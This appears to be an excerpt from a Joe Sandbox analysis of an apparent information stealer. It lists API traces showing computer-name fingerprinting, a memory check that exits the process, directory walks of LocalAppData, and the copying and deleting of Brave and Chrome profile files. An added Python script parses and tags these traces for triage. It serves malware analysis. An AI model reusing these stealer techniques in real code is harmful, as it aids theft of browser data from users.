                        • Graph image not reproduced; from its node list: function 50ee90-50efa0: a call to internal function 4f2930 at entry, an optional lstrcpy (50eec1-50eec3), a call to internal function 4f6c40, StrCmpCA at 50eed2-50eee8, then either a path through internal calls 4f2a20/4f2930 with a second optional lstrcpy (50ef3e-50ef3f), or a loop at 50ef20-50ef28; all paths end in block 50ef45-50efa0 with ten calls to internal function 4f2a20.
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 0050EEC3
                        • StrCmpCA.SHLWAPI(?,ERROR), ref: 0050EEDE
                        • lstrcpy.KERNEL32(00000000,ERROR), ref: 0050EF3F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: lstrcpy
                        • String ID: ERROR
                        • API String ID: 3722407311-2861137601
                        • Opcode ID: 1ebc0bed2db8a2154d3f5954556a2d30b34cbde4b3ca60786aac8e06bec73e18
                        • Instruction ID: a02d2ea385c51119dcfb86efc6874bd7dbf4701b6488d8fb5c5810c836307ff7
                        • Opcode Fuzzy Hash: 1ebc0bed2db8a2154d3f5954556a2d30b34cbde4b3ca60786aac8e06bec73e18
                        • Instruction Fuzzy Hash: 6C210570B1014E5BCB21FF76DD46A6E3BA4FF10304F14586DB949D7292DA74DC118B94

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 4f10c0-4f111d: GlobalMemoryStatusEx at 4f10de-4f10f3, followed by result checks (4f10f5-4f1106, 4f1108, 4f110a-4f1110) from which three edges lead to ExitProcess (4f1112-4f1114) and only one path reaches the normal exit block 4f111a-4f111d.
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: ExitGlobalMemoryProcessStatus
                        • String ID: @
                        • API String ID: 803317263-2766056989
                        • Opcode ID: 240e6091fb5790abc90b00af40face7da9ecf13f5f1a3c3dde50f2bbd5f24ac4
                        • Instruction ID: f8373780ddf56193da62d476036dd705b14dfee3467f74b7792619feef4f5add
                        • Opcode Fuzzy Hash: 240e6091fb5790abc90b00af40face7da9ecf13f5f1a3c3dde50f2bbd5f24ac4
                        • Instruction Fuzzy Hash: 37F02E7010424DCBE7106A65DA0573EF7DCE705350F14452BDF96C22A1EA38C840912F

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 508c88-508eef, an alternate entry into the same body as the function at 508ca0. The entry block calls StrCmpCA and branches directly to an ExitProcess block (508cc6-508cc7) on one edge; otherwise block 508cff fans out to thirteen comparison blocks (StrCmpCA or lstrlen), which converge on a tail that may call lstrcpy (508ebb-508ebd) before returning through internal functions 4f2a20 and 4f2930.
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Similarity
                        • API ID: ExitProcess
                        • String ID: block
                        • API String ID: 621844428-2199623458
                        • Opcode ID: 09483b232096fd09e7f1a0966e38def93de5feb9a7d569cbe211a2bb5c0377e8
                        • Instruction ID: 2f68665c6b69de84acd6ecabc564883f76e30f04cca19bd428d863457a5bf70c
                        • Opcode Fuzzy Hash: 09483b232096fd09e7f1a0966e38def93de5feb9a7d569cbe211a2bb5c0377e8
                        • Instruction Fuzzy Hash: B1E0D860200246EFD7209BB5DC48D5B7FACFF84700B05C168E9455B161DB34DC02C7D8

                        Control-flow Graph
                        • Graph image not reproduced; from its node list: function 512ad0-512b59: GetProcessHeap, RtlAllocateHeap and GetComputerNameA in the entry block (512ad0-512b22), which then branches to one of two exit blocks (512b44-512b59 or 512b24-512b36).
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512AFF
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00512B06
                        • GetComputerNameA.KERNEL32(00000000,00000104), ref: 00512B1A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: Heap$AllocateComputerNameProcess
                        • String ID:
                        • API String ID: 1664310425-0
                        • Opcode ID: 8cf193d0708492dbdce95b81538e7686fc0002efe7d7e8955ccfa7693ec69c23
                        • Instruction ID: 4e3d0869397ea445dae63e145aaa7f9f2269ce447874493ca172c61316c1831f
                        • Opcode Fuzzy Hash: 8cf193d0708492dbdce95b81538e7686fc0002efe7d7e8955ccfa7693ec69c23
                        • Instruction Fuzzy Hash: 7001D672A44258ABD720CF99EC45BADFBB8F745B21F00426AFA19E3780D778590087A5
                        APIs (directory enumeration: a search path is assembled with lstrcpy/lstrcat, terminated with \*.*, and handed to FindFirstFileA)
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005023D4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005023F7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502402
                        • lstrlen.KERNEL32(\*.*), ref: 0050240D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050242A
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 00502436
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050246A
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00502486
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                        • String ID: \*.*
                        • API String ID: 2567437900-1173974218
                        • Opcode ID: 243d5e643c9a66739d39c35b627d99de133bbf4bcb597f85b80fc2b8e42beb6a
                        • Instruction ID: 61834096e1905f3b912e832a0b554bc3c49aaa6c40e0557af1514b17efd7cd9b
                        • Opcode Fuzzy Hash: 243d5e643c9a66739d39c35b627d99de133bbf4bcb597f85b80fc2b8e42beb6a
                        • Instruction Fuzzy Hash: EDA2B570A0161A9BDB31AF75DD8DAAF7BB8FF04704F088029B905D7291DB78DD428B58
                        APIs (recursive directory walk: the base folder comes from SHGetFolderPathA with CSIDL 0x1C, which is CSIDL_LOCAL_APPDATA; \*.* is appended with lstrcat, FindFirstFileA opens the search, each entry is compared with StrCmpCA against two short fixed strings at 005217A0 and 005217A4 that the sandbox did not resolve (the position where a walk skips "." and ".."), and GetFileAttributesA checks the assembled path)
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F16E2
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1719
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F176C
                        • lstrcat.KERNEL32(00000000), ref: 004F1776
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F17EF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F17F9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1825
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1875
                        • lstrcat.KERNEL32(00000000), ref: 004F187F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F18F3
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F18FE
                        • lstrlen.KERNEL32(00521794), ref: 004F1909
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1929
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1935
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F195B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1966
                        • lstrlen.KERNEL32(\*.*), ref: 004F1971
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F198E
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 004F199A
                          • Part of subcall function 00514040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0051406D
                          • Part of subcall function 00514040: lstrcpy.KERNEL32(00000000,?), ref: 005140A2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F19C3
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1A0E
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A16
                        • lstrlen.KERNEL32(00521794), ref: 004F1A21
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A41
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1A4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1A76
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1A81
                        • lstrlen.KERNEL32(00521794), ref: 004F1A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1AAC
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1AB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1ADE
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1AE9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1B11
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004F1B45
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004F1B70
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004F1B8A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1BC4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1BFB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1C03
                        • lstrlen.KERNEL32(00521794), ref: 004F1C0E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1C31
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1C3D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1C69
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1C74
                        • lstrlen.KERNEL32(00521794), ref: 004F1C7F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1CA2
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1CAE
                        • lstrlen.KERNEL32(?), ref: 004F1CBB
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1CDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1CE9
                        • lstrlen.KERNEL32(00521794), ref: 004F1CF4
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1D14
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1D20
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D46
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1D51
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D7D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DE0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1DEB
                        • lstrlen.KERNEL32(00521794), ref: 004F1DF6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1E19
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1E25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1E4B
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F1E56
                        • lstrlen.KERNEL32(00521794), ref: 004F1E61
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1E81
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F1E8D
                        • lstrlen.KERNEL32(?), ref: 004F1E9A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1EBA
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1EC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1EF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1F3E
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004F1F45
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F1F9F
                        • lstrlen.KERNEL32(01038A70), ref: 004F1FAE
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F1FDB
                        • lstrcat.KERNEL32(00000000,?), ref: 004F1FE3
                        • lstrlen.KERNEL32(00521794), ref: 004F1FEE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F200E
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F201A
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F2042
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004F204D
                        • lstrlen.KERNEL32(00521794), ref: 004F2058
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004F2075
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004F2081
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                        • String ID: \*.*
                        • API String ID: 4127656590-1173974218
                        • Opcode ID: 7711b87abe5494c231dc44aaa640a907177ed9bca8275ad80ec57e031dbe1520
                        • Instruction ID: 81f4f212b07a3bd0f0fdbe41813a352b24522c2db72c460269295824251ea942
                        • Opcode Fuzzy Hash: 7711b87abe5494c231dc44aaa640a907177ed9bca8275ad80ec57e031dbe1520
                        • Instruction Fuzzy Hash: 9B928571A0121EDBDB21AF65DE85ABF77B9EF40704F044026FA05A7261DB7CDD028B98
                        APIs (browser profile collection: entries returned by FindFirstFileA are compared with StrCmpCA against "Brave", "Preferences" and "Google Chrome", the path \Brave\Preferences is assembled, a file is copied with CopyFileA with bFailIfExists = 1, and a file is later removed with DeleteFileA; copying a profile file aside, reading the copy and deleting it is how stealers reach files the running browser keeps open)
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDBEF
                        • lstrlen.KERNEL32(00524CA8), ref: 004FDBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC17
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 004FDC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC4C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDC8F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004FDCD0
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004FDCF0
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004FDD0A
                        • lstrlen.KERNEL32(0051CFEC), ref: 004FDD1D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDD7B
                        • lstrlen.KERNEL32(00521794), ref: 004FDD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDA3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDDAF
                        • lstrlen.KERNEL32(?), ref: 004FDDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 004FDDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDE19
                        • lstrlen.KERNEL32(00521794), ref: 004FDE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDE6F
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDE7B
                        • lstrlen.KERNEL32(010388F0), ref: 004FDE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDEBB
                        • lstrlen.KERNEL32(00521794), ref: 004FDEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDEE6
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDEF2
                        • lstrlen.KERNEL32(01038A40), ref: 004FDF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFA5
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDFB1
                        • lstrlen.KERNEL32(010388F0), ref: 004FDFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDFF4
                        • lstrlen.KERNEL32(00521794), ref: 004FDFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE022
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FE02E
                        • lstrlen.KERNEL32(01038A40), ref: 004FE03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FE06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 004FE0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 004FE0E7
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE11F
                        • lstrlen.KERNEL32(0103D010), ref: 004FE12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE155
                        • lstrcat.KERNEL32(00000000,?), ref: 004FE15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE19F
                        • lstrcat.KERNEL32(00000000), ref: 004FE1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE1F9
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE22F
                        • lstrlen.KERNEL32(01038A70), ref: 004FE23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE261
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004FE269
                        • lstrlen.KERNEL32(\Brave\Preferences), ref: 004FE274
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE29B
                        • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 004FE2A7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE2CF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE30F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE349
                        • DeleteFileA.KERNEL32(?), ref: 004FE381
                        • StrCmpCA.SHLWAPI(?,0103D070), ref: 004FE3AB
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE3F4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE41C
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE445
                        • StrCmpCA.SHLWAPI(?,01038A40), ref: 004FE468
                        • StrCmpCA.SHLWAPI(?,010388F0), ref: 004FE47D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE4D9
                        • GetFileAttributesA.KERNEL32(00000000), ref: 004FE4E0
                        • StrCmpCA.SHLWAPI(?,0103D028), ref: 004FE58E
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE5C4
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE639
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE678
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE6A1
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE6C7
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE70E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE737
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE75C
                        • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 004FE776
                        • DeleteFileA.KERNEL32(?), ref: 004FE7D2
                        • StrCmpCA.SHLWAPI(?,01038BA0), ref: 004FE7FC
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE88C
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE8B5
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE8EE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE916
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE952
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 2635522530-726946144
                        • Opcode ID: 918b99af38b05711493eb8a3d5d39eeab76184b486c8580a537399e7a658fb46
                        • Instruction ID: 2038e71f5a99180e379baf7b2afffc0d652658929395628b7bac70d5d9a42d28
                        • Opcode Fuzzy Hash: 918b99af38b05711493eb8a3d5d39eeab76184b486c8580a537399e7a658fb46
                        • Instruction Fuzzy Hash: 3992A571A0020E9BDB20EF66DD89ABF77B9AF44304F04452AFA0597350DB7CDC468B99
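                        The function records above are raw API traces, and a dump of this size has hundreds of them. The following Python script is an added triage aid, not part of the Joe Sandbox report: it parses the "APIs" bullet format (including the "Part of subcall function" prefix), keeps the arguments the sandbox resolved to strings, and tags a record with the behaviours visible in the records above: GetComputerNameA host fingerprinting, \*.* enumeration through FindFirstFileA, SHGetFolderPathA with CSIDL 0x1C (CSIDL_LOCAL_APPDATA), browser-profile strings, and CopyFileA paired with DeleteFileA. The embedded sample records are lines copied from the traces above; the tag names, the marker list and the heuristic rules are the script's own, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass
from typing import Optional, Tuple

# One "APIs" bullet of a Joe Sandbox function record, optionally prefixed by
# "Part of subcall function <addr>:" when the call was made from a callee:
#   <api>.<module>(<arg>,<arg>,...), ref: <addr>
_CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)
_HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Sample input: lines copied from the function records above (a few per record).
RECORD_GETCOMPUTERNAME = """
• GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00512AFF
• RtlAllocateHeap.NTDLL(00000000), ref: 00512B06
• GetComputerNameA.KERNEL32(00000000,00000104), ref: 00512B1A
"""
RECORD_FINDFIRST = r"""
• lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005023D4
• lstrlen.KERNEL32(\*.*), ref: 0050240D
• lstrcat.KERNEL32(00000000,\*.*), ref: 00502436
• FindFirstFileA.KERNEL32(00000000,?), ref: 00502486
"""
RECORD_WALK = r"""
• lstrcat.KERNEL32(00000000,\*.*), ref: 004F199A
  • Part of subcall function 00514040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0051406D
• FindFirstFileA.KERNEL32(00000000,?), ref: 004F1B45
• StrCmpCA.SHLWAPI(?,005217A0), ref: 004F1B70
• GetFileAttributesA.KERNEL32(00000000), ref: 004F1F45
"""
RECORD_BRAVE = r"""
• FindFirstFileA.KERNEL32(00000000,?), ref: 004FDCD0
• StrCmpCA.SHLWAPI(?,Brave), ref: 004FE0CD
• StrCmpCA.SHLWAPI(?,Preferences), ref: 004FE0E7
• CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE1F9
• lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 004FE2A7
• DeleteFileA.KERNEL32(?), ref: 004FE381
• StrCmpCA.SHLWAPI(?,Google Chrome), ref: 004FE776
"""

# Heuristic markers; tag names below are this script's own, not Joe Sandbox signatures.
BROWSER_MARKERS = ("Brave", "Google Chrome", "Preferences")
CSIDL_LOCAL_APPDATA = 0x1C


@dataclass(frozen=True)
class Call:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int                       # address of the call instruction
    subcall: Optional[int] = None  # callee the sandbox attributed the call to, if any

    @property
    def literals(self) -> Tuple[str, ...]:
        """Arguments the sandbox resolved to a string (neither a raw 32-bit value nor '?')."""
        return tuple(a for a in self.args if a != "?" and not _HEX8_RE.match(a))


def parse_trace(text: str):
    """Parse the bullets of one function record into Call objects, in trace order."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        m = _CALL_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised trace line: {line!r}")
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        sub = int(m["sub"], 16) if m["sub"] else None
        calls.append(Call(m["api"], m["module"], args, int(m["ref"], 16), sub))
    return calls


def classify(calls):
    """Tag a record with the behaviours seen in the traces above."""
    apis = {c.api for c in calls}
    lits = {lit for c in calls for lit in c.literals}
    tags = set()
    if "GetComputerNameA" in apis:
        tags.add("host-fingerprint")
    if "FindFirstFileA" in apis and any(lit.endswith("*.*") for lit in lits):
        tags.add("directory-enumeration")
    if any(mark in lit for lit in lits for mark in BROWSER_MARKERS):
        tags.add("browser-profile-strings")
    if "CopyFileA" in apis and "DeleteFileA" in apis:
        tags.add("copy-then-delete")
    for c in calls:  # SHGetFolderPathA(hwnd, csidl, ...): the second argument is the CSIDL
        if (c.api == "SHGetFolderPathA" and len(c.args) > 1 and _HEX8_RE.match(c.args[1])
                and int(c.args[1], 16) == CSIDL_LOCAL_APPDATA):
            tags.add("walks-local-appdata")
    return tags


def computer_name_buffer(calls) -> Optional[int]:
    """nSize passed to GetComputerNameA (0x104 = 260 = MAX_PATH in the record above)."""
    for c in calls:
        if c.api == "GetComputerNameA" and len(c.args) > 1 and _HEX8_RE.match(c.args[1]):
            return int(c.args[1], 16)
    return None


def copy_fail_if_exists(calls):
    """bFailIfExists (third CopyFileA argument) for each CopyFileA call in the record."""
    return [c.args[2] == "00000001" for c in calls if c.api == "CopyFileA" and len(c.args) >= 3]
```

Paste any number of records into strings and run classify(parse_trace(...)) over each; records that come back with both browser-profile-strings and copy-then-delete are the ones worth opening first in the disassembler, and unresolved 8-hex-digit arguments (such as 005217A0 above) are the addresses to look up in the dump.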
                        APIs (directory enumeration: \*.* is appended to the path, FindFirstFileA opens the search, and each entry is compared with StrCmpCA against the same two fixed strings at 005217A0 and 005217A4 as in the walk above before further paths are assembled)
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005018D2
                        • lstrlen.KERNEL32(\*.*), ref: 005018DD
                        • lstrcpy.KERNEL32(00000000,?), ref: 005018FF
                        • lstrcat.KERNEL32(00000000,\*.*), ref: 0050190B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501932
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 00501947
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 00501967
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00501981
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005019BF
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005019F2
                        • lstrcpy.KERNEL32(00000000,?), ref: 00501A1A
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501A25
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501A4C
                        • lstrlen.KERNEL32(00521794), ref: 00501A5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501A80
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501A8C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501AB4
                        • lstrlen.KERNEL32(?), ref: 00501AC8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501AE5
                        • lstrcat.KERNEL32(00000000,?), ref: 00501AF3
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B19
                        • lstrlen.KERNEL32(01038B10), ref: 00501B2F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B59
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501B64
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501B8F
                        • lstrlen.KERNEL32(00521794), ref: 00501BA1
